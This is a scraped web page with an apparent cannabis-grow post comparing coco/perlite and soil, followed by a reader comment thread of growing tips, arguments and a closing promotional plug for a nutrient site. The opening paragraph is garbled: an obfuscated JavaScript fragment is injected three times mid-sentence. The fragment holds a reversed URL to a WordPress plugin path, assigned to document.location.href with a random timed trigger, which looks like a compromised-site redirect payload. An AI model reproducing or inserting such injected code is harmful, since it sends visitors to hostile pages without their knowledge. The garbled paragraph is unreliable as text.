it’s been a few months since we looked at these two plants.. last time we saw these two plants they were in 1 gallon pots being transplanted intoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to 5 gallon pots.. now as you can see they are both in 10 gallon pots, being trained toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be ready toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be put in flower… there definitely are some noticeable differences between cocoa growing and soil growing. plants definitely grow more accelerated in Coco and perlite…

personally i think coco is better for bigger and faster growth and soil is better for a buffer for nutes, if your not super good at reading plants and there deficiency's the soil ( in my experience ) can be easier to grow in to start. ive ran coco and always had problems keeping them as healthy as my soil one's, i also find it hard knowing when to water coco vs the soil.

  3. patrick says:

Hydroponic grow huh? Funny there was a dude a few videos ago arguing that this isn't hydro. Funny how things tend to play out.

  4. Respect ThaGame says:

Put some worm casting on the top an water it in the soil Wizard , I don't care what kind of NPK your coming up with worm casting is the best. It bring the soil an the roots together an that's from years of experience!!

  7. Black Weed says:

How are we doing today we live in pain from day today that's how we do today glad to see you're doing all right though

  8. Black Weed says:

Well well well you're going down the wrong avenues what you're asking is a trick question so let me say this as an opinion if you took dirt and you added amendments and teas to feed the microbiology that's under the dirt or in the dirt you would get a much bigger plant opposed to a 50/50 mix of perlite and Coco because perlite in Coco do not need to be amended opposed to dirt does that is a rule of thumb any halfway decent grower would know that like the back of their hand so all we are saying is what you have under the plant you need to treat it in accordingly with Coco and perlite there's no real work in the ground with 3rd you need to amend it you need to keep on top of it with the biological sense of keeping the roots alive and perlite and Coco all you do is feed feed feed in dirt you have to give keys to keeping the might of the mycological part of it allwe hope this makes sense to someone we were just trying to put our opinion out there to give you a answer to your question can't wait to see the next one

  9. Black Weed says:

Let me say about substantial amounts what you feed that dirt is what that plants going to become what you feed that Coco and perlite is what that plants going to become now if I'm wrong please call me at just keep in mind this is just my opinion happy growing can't wait to see the next one

  10. Black Weed says:

You do understand that with dirt bugs come with that with Coco and perlite bugs do not come with that so that should tell you something about how big the plant is going to become if you feed the dirt the right things and it is the right strain the plant will become bigger who produced way more then any hydroponics because you have a living organism on top as well as on the bottom opposed to Coco and perlite is not a living organism you are trying to simulate a living organism inside of the Coco husk with perlite to aerate there is nothing alive in that dirt is a live it has creatures in it this all makes sense by taking one trip to a library and read read read read read and read some more just keep in mind this is just our opinion happy growing can't wait to see the next one

this channel is very exciting to us because it challenges our minds to think about some things that you are asking as well as learning from our mistakes and are successful grow. S .. ✨ don't get me wrong we don't know everything we are here to learn and to help outbeing loved when you asked questions it's almost as though we have to look for the answers in our experienced mine to come up with the answer that's what we love about this show you can learn a lot so keep it growing so we can keep on watching

  12. Black Weed says:

And back in the early 80s about one summer we caught the nickname black weed because everyone else was growing this real light green weed and are we eat was a blackish purple it was called tie stick at the time we didn't know what we had and we sure didn't know what kind of strain it was we just knew it was very smooth and everybody wanted it or should I say needed it so we tried our best to help everyone out but you know what times were then the only thing we helped ourselves to was cold steel in concrete it was some kind of vacation that we were not going to be returning to so over the years we have laid low and only a handful of patients new of us but it all worked out for the best now look at cannabis it is very plentiful and there are so many cannabis strains so now we revert back to problem solving but like everyone else we do not know that much we learn with others and try to have fun doing it we hope you understand where we come from and what we're trying to have fun with so we look forward to hearing your questions so you can pluck our minds and make us remember things we are forgot we really appreciate hard-working people like you in the Cannabis interest industry so keep those videos coming out

Just do a final take down and yield.

  15. tivis cahoon says:

I don’t no ur feeding regimen but if ur not watering the coco/perlite especially in that size pot 3 to 4 times a day ur going to get soil results and u def atleast have to water 50%coco an 50% perlite twice a day or that plant is going to suffer . Like I said idk ur regimen but coco has to b treated like hydro or u will not receive the benefits of coco . It should b blowing the soil grow away at this point . I’m not putting ur garden down or trying to b an asshole u have a great set up I just wanted to let u no if ur not doing those things then doing em will give u better results .

  16. Game Changer says:

Your grow is dirty and you guys aint cleaning your pots saucers and trays. Thats how lazy dirtbags grow.

  17. Cheap_Gorilla says:

Hi, I've been debating whether to grow in soil or Coco. People keep mentioning cal mag, will I definitely be needing that if I grow in Coco? I'll be using GH Flora , grow and Bloom. Oh and I'll just be growing autos

  18. Armed American Patriot says:

Awesome video thank you very much I'm also growing in Coco and perlite having amazing results I'm using the Mills basis product It's A and B two-part mixture with Cal Mag also going through once every two weeks hitting it up with recharge

  19. D Max says:

yes, please update as it progresses!

  20. Mike Hawk says:

They both look like a mess how could u possibly compare anything on them 2 lanky ass plants bud ? U should try giving them a decent life first before a comparison my god what were them the ugliest saddest shittiest plants u could find in your whole town looks like they just came out of a week in a dark closet they are starting to look like grape vines man . They couldn't even support buds those vines would be hanging on the floor . You need more plants side by side also 2 plants wouldn't be enough to do a good comparison either one could just get a little better start , or lighting , or air etc , it only takes one little error on your doings and one plant is doomed from the get go . You would need to do a few in each medium at least to truly understand and a compare them . Good starter video but your outcome will be based on what you yourself do to each of the mediums more then what they have the potential to do . each work well in there own way and differently in different environments . If you use both mediums the same then it's a fail there not meant to be used the same way . What im saying is it depends as much on you or more the grower then it does the medium . Cheers. grow grow grow !

  21. J3 Orbit says:

    Great video
very excited to see the final results.

  22. Derek Lee says:

How long do u wait till u transplant the plant from pot to pot??

  23. DC LONEWOLF says:

Filming too close, can't see the difference between plants

  24. Keith Ashley says:

    which do you normorly use?

  25. Trippy Terpenes says:

why perlite? have u ever try 100% coco. if u think its better with perlite I should try this.

  26. simsakamrgreenthumb says:

Coco is technically hydro. But is still the closest to a soil grow. Dwc vs soil would truly be the test. But I kno the answer, hydro wins! Yield speed & size wise. But flavor… soil always reigns king!

  27. Game Changer says:

Soil tastes better but coco grows better

  28. Julian R says:

I know you americans use stupid measurements but fingers.. really.. lol, VERY wizardy, little science involved 😛

  29. jasper23454 says:

You could do very well on a lecture circuit. Your advice is always relevant and helpful. Thank you

  30. delosombres says:

Coco is a hydroponic medium. If you grow in coco like in a soil (big pots, watering only once per 1/2 days) you're doing it wrong. Coco needs smaller pots and watering 5+ times per day drain to waste (just like rockwool). That's how you get real hydro results.

  31. Bushylingus says:

The coco plant has had more branches cut off than the soil plant.

  32. svaldez737 says:

should link all of the vid series in the description

  33. olesoulle says:

Is this the last video in this series? I was very much hoping to see the comparison at harvest.

  34. Wizard NPK says:

Guys, I am growing with NPK420.com nutrients.  As one of the original test users I got to help dial it in to what you see in this video. Attention Growers: They are still giving away free nutruents
